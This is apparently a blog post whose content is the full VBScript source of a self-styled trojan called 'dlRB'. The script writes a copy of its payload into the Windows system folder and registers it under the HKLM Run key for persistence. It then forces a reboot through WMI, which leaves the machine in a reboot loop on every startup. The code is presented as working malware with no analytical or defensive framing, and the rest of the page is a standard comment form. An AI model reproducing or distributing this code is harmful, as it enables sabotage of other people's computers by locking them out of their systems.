SCRIPT VIRUS TROJAN

rem – dlRB “DL Reboot” Trojan script by R.E.C.I.B.E.R
On Error Resume Next
dim FSobj,sysDir,generateCopy,newFile,fixedCode,procreateCopy,fileData
set FSobj=CreateObject(“Scripting.FileSystemObject”)
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB.vbs”
sub createRegKey(regKey,regVal)
set regEdit = CreateObject(“WScript.Shell”)
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+”\dlRB.vbs”)
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),””””)
set procreateCopy=FSobj.OpenTextFile(sysDir+”\dlRB.vbs”,2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData=”rem – ^dlRB^ by D.L.” &vbcrlf& _
“strComputer = ^.^ ” &vbcrlf& _
“Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _
“& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)” &vbcrlf& _
“Set colOperatingSystems = objWMIService.ExecQuery _ ” &vbcrlf& _
“(^Select * from Win32_OperatingSystem^)” &vbcrlf& _
“For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _
“ObjOperatingSystem.Reboot()” &vbcrlf& _
“Next”
end function
function rebootSystem()
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate,(Shutdown)}!\\” & strComputer & “\root\cimv2”)
Set colOperatingSystems = objWMIService.ExecQuery _
(“Select * from Win32_OperatingSystem”)
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s